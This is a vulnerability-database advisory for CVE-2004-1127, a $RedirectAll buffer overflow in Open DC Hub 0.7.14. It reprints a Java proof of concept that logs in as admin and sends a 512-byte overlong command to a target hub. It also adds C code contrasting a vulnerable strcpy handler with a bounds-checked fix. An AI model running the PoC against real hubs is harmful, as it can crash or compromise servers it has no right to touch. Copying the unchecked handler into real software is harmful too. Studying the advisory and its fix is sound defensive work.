Open DC Hub RedirectAll Buffer Overflow Vulnerability

Vulnerability ID: 1108299
Type: Buffer overflow
Published: 2004-11-24
Updated: 2005-10-20
CVE: CVE-2004-1127
CNNVD-ID: CNNVD-200501-212
Platform: Multiple
CVSS score: 10.0
|Sources
https://www.exploit-db.com/exploits/24774
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200501-212
|Details
Open DC Hub is hub server software for the Direct Connect (DC) file-sharing network. Open DC Hub 0.7.14 contains a buffer overflow in the handling of the $RedirectAll hub command: the command argument is copied into a fixed-size buffer without a length check. A remote attacker who has authenticated as hub administrator (with the $adminpass command, as the proof of concept below does) can send an overly long $RedirectAll command and execute arbitrary code with the privileges of the hub process. The admin password is therefore a precondition for exploitation, not a mitigation once it is shared or weak.
|Exploit
source: http://www.securityfocus.com/bid/11747/info

A remote buffer overflow vulnerability reportedly affects the Open DC Hub. This issue is due to a failure of the application to properly validate the length of user-supplied strings prior to copying them into finite process buffers.

An attacker may exploit this issue to execute arbitrary code with the privileges of the user that activated the vulnerable application. This may facilitate unauthorized access or privilege escalation.


/*
   Open Dc Hub (0.7.14) - Buffer Overflow - Proof Of Concept
   Coded by: Donato Ferrante
*/

import java.net.Socket;
import java.net.UnknownHostException;
import java.net.SocketTimeoutException;
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.io.PrintStream;

public class OpenDcHub0714_BOF_poc {

    private static int PORT  = 53696;        // default Open DC Hub listening port
    private static int MAXSZ = 512;          // number of filler bytes in the $RedirectAll argument
    private static String VERSION = "0.1";

    public static void main(String [] args){

        System.out.println(
            "\n\n" +
            "Open Dc Hub - Buffer Overflow - Proof Of Concept\n" +
            "Version: " + VERSION + "\n" +
            "coded by: Donato Ferrante\n" +
            "e-mail: [email protected]\n" +
            "web: www.autistici.org/fdonato\n\n"
        );

        if(args.length <= 1){
            System.out.println(
                "Usage: java OpenDcHub0714_BOF_poc <host> <port> <admin_password>\n" +
                "Note:  default port is 53696.\n"
            );
            System.exit(-1);
        }

        String host = args[0];
        String admin_password = args[args.length - 1];   // the password is always the last argument
        int port = PORT;

        try{
            if(args.length > 2)
                port = Integer.parseInt(args[1]);
        }catch(Exception e){ port = PORT; }

        try{
            Socket socket = new Socket(host, port);
            socket.setSoTimeout(10000);
            BufferedReader in_stream  = new BufferedReader(new InputStreamReader(socket.getInputStream()));
            PrintStream out_stream    = new PrintStream(socket.getOutputStream());

            // Consume the hub's greeting lines.
            System.out.println(in_stream.readLine());
            System.out.println(in_stream.readLine());
            System.out.println(in_stream.readLine());
            System.out.println(in_stream.readLine());

            // $RedirectAll is an administrator command, so authenticate first.
            System.out.println("Logging...");
            out_stream.println("$adminpass " + admin_password + "|\n");

            in_stream.readLine();
            String err = in_stream.readLine();

            // The hub answers a wrong password with a message containing "bad".
            if(err == null || err.toLowerCase().indexOf("bad") >= 0){
                System.out.println("Login failed...");
                System.out.println("Exiting...");
                System.exit(-1);
            }
            else
                System.out.println("Logged in...");

            System.out.println("Building test string to inject...");
            String buff = build();
            Thread.sleep(1500);

            System.out.println("Injecting test string...");
            out_stream.println(buff);
            Thread.sleep(1500);

            System.out.println("Proof_Of_Concept terminated.");

        }catch(SocketTimeoutException ste){ System.out.println("Socket timeout."); System.exit(-1); }
         catch(UnknownHostException uhe){ System.out.println("Host: " + host + " unknown.."); System.exit(-1); }
         catch(InterruptedException ie){ System.out.println("Thread warning..."); }
         catch(Exception ioe){ System.out.println("Unable to create the socket!"); System.exit(-1); }
    }

    // Build "$RedirectAll " followed by MAXSZ 'a' bytes and the DC command terminator '|'.
    private static String build(){
        StringBuilder over = new StringBuilder(MAXSZ);
        for(int i = 0; i < MAXSZ; i++)
            over.append((char) 0x61);   // 'a'; as an int, 0x61 would have appended the text "97" instead
        return "$RedirectAll " + over + "|\n";
    }
}
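The pattern the BID text describes (a user-supplied string copied into a fixed process buffer with no length check) next to the bounds check that closes it, as an added C example. This is illustrative code written for this page, not Open DC Hub's source: the buffer size REDIRECT_BUF, the handler names and the sample target 1.2.3.4:411 are assumptions. build_redirect_all() produces the same bytes the Java proof of concept above sends, so the hardened handler can be checked against the real payload shape.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed size of the handler's fixed buffer; chosen for the demonstration,
 * not taken from Open DC Hub. */
#define REDIRECT_BUF 128

#define CMD_PREFIX "$RedirectAll "

/* Build what the PoC sends: "$RedirectAll " + n bytes of 'a' + the Direct
 * Connect command terminator '|'. Caller frees the result. */
char *build_redirect_all(size_t n)
{
    size_t plen = strlen(CMD_PREFIX);
    char *buf = malloc(plen + n + 2);
    if (!buf)
        return NULL;
    memcpy(buf, CMD_PREFIX, plen);
    memset(buf + plen, 'a', n);
    buf[plen + n] = '|';
    buf[plen + n + 1] = '\0';
    return buf;
}

/* Vulnerable pattern: the argument is copied into a fixed stack buffer with
 * no length check. A 512-byte argument writes well past 'target' and
 * corrupts the stack. Kept only for contrast; never feed it long input.
 * Returns the length of the stored target. */
int handle_redirect_all_vulnerable(const char *cmd)
{
    char target[REDIRECT_BUF];
    char *end;

    if (strncmp(cmd, CMD_PREFIX, strlen(CMD_PREFIX)) != 0)
        return -1;
    strcpy(target, cmd + strlen(CMD_PREFIX));   /* unbounded copy: overflow here */
    end = strchr(target, '|');
    if (end)
        *end = '\0';
    return (int)strlen(target);
}

/* Hardened handler: measure the argument up to the '|' terminator first and
 * refuse anything that would not fit in the destination with its NUL.
 * Returns 0 on success, -1 if malformed, -2 if too long or empty. */
int handle_redirect_all_safe(const char *cmd, char *out, size_t outsz)
{
    const char *arg, *end;
    size_t len;

    if (strncmp(cmd, CMD_PREFIX, strlen(CMD_PREFIX)) != 0)
        return -1;                  /* not this command */
    arg = cmd + strlen(CMD_PREFIX);
    end = strchr(arg, '|');
    if (!end)
        return -1;                  /* unterminated command */
    len = (size_t)(end - arg);
    if (len == 0 || len >= outsz)
        return -2;                  /* would not fit: drop it, do not truncate silently */
    memcpy(out, arg, len);
    out[len] = '\0';
    return 0;
}

int main(void)
{
    char dst[REDIRECT_BUF];
    char *payload = build_redirect_all(512);    /* the PoC's 512-byte argument */
    int rc;

    rc = handle_redirect_all_safe(payload, dst, sizeof dst);
    printf("512-byte $RedirectAll: safe handler returned %d (rejected)\n", rc);

    rc = handle_redirect_all_safe("$RedirectAll 1.2.3.4:411|", dst, sizeof dst);
    printf("short $RedirectAll: rc=%d target=%s\n", rc, dst);

    free(payload);
    return 0;
}
```

The vulnerable handler is deliberately not run against the 512-byte payload; doing so corrupts the stack and, depending on the compiler's stack protector, either aborts or behaves unpredictably. The safe handler rejects the oversized argument with -2 rather than truncating it, which keeps the hub from silently redirecting users to a mangled address.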
|References

Source: BID
Name: 11747
Link: http://www.securityfocus.com/bid/11747
Source: BUGTRAQ
Name: 20041124 Buffer Overflow in Open Dc Hub 0.7.14
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=110144606411674&w=2
Source: XF
Name: open-hub-redirectall-bo(18254)
Link: http://xforce.iss.net/xforce/xfdb/18254
Source: GENTOO
Name: GLSA-200411-37
Link: http://www.gentoo.org/security/en/glsa/glsa-200411-37.xml
Source: FULLDISC
Name: 20041124 Buffer Overflow in Open Dc Hub 0.7.14
Link: http://lists.grok.org.uk/pipermail/full-disclosure/2004-November/029383.html
